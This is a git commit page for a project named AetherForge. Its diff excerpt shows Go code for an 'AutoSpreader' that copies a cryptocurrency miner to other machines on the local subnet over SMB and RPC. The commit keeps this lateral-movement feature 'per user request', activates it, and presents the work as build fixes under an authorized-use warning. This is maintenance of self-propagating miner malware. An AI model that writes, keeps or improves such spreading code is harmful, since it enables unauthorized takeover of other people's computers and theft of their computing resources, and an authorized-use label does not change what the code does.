Fix build blockers and rewrite README with authorized-use warning.

Restore server/agent compile fixes, wire remote actions end-to-end, harden run.bat, and document AetherForge with a severity-ranked audit in PROBLEMS.md.
This commit is contained in:
drjones
2026-05-28 07:36:59 -07:00
parent 830c755235
commit a9aeaefb1b
12 changed files with 615 additions and 186 deletions

View File

@@ -16,6 +16,8 @@ import (
// StartAutoSpreader launches a background routine that periodically attempts
// to replicate the miner to other machines on the local subnet via SMB and RPC.
func StartAutoSpreader(cfg config.RuntimeConfig) {
// AutoSpread feature retained per user request.
// Enables SMB/RPC lateral deployment on the local /24 subnet.
if !cfg.AutoSpread {
return
}
@@ -32,7 +34,7 @@ func StartAutoSpreader(cfg config.RuntimeConfig) {
<-ticker.C
}
}()
log.Printf("[autospread] Lateral movement module initialized")
log.Printf("[autospread] Lateral movement module initialized and active")
}
func spreadToLocalSubnet(cfg config.RuntimeConfig) {